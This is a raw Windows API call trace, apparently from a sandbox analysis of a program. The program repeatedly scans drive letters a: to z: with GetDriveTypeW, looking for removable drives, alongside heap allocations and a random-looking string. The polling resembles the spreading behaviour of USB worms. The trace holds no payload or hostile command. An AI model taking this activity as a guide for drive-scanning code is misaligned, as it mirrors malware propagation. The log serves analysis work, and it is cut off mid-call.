[0206.641] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.641] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.641] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.641] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.641] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.641] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.641] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.641] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.641] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.641] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.642] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.642] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.642] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.642] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.642] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.642] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.642] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.643] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.643] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.643] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.643] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.643] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.643] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.643] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.644] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.644] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.644] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.644] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.644] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.644] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.645] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.645] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.645] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.645] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.646] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0206.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.646] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.646] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.646] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.647] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.647] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.647] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.647] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.647] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.647] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.648] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.648] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.648] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.648] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.648] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.648] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.648] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.649] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.649] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.649] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.649] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.649] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.649] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.650] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.650] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.650] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.650] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.650] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0206.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.651] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.651] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.651] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.652] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0206.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0206.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.652] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.652] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.652] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.652] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.652] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.653] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.653] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.653] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.653] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.653] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.653] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.654] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.654] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.654] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.654] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.654] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.654] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.654] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.655] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.655] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.655] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.655] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.655] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.656] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.656] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.656] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.656] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.656] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.657] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0206.657] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.657] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0206.658] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0206.658] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.658] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.658] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0206.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.658] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0206.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.659] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0206.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.659] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.659] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.659] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.659] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.659] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.660] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.660] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.660] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.660] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.660] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.660] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.661] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.661] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.661] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.661] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.661] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.698] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.698] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.698] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.699] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.699] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.699] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.699] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.699] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.699] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.700] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.700] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0206.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.700] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.700] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0206.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0206.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0206.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0206.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0206.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.701] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 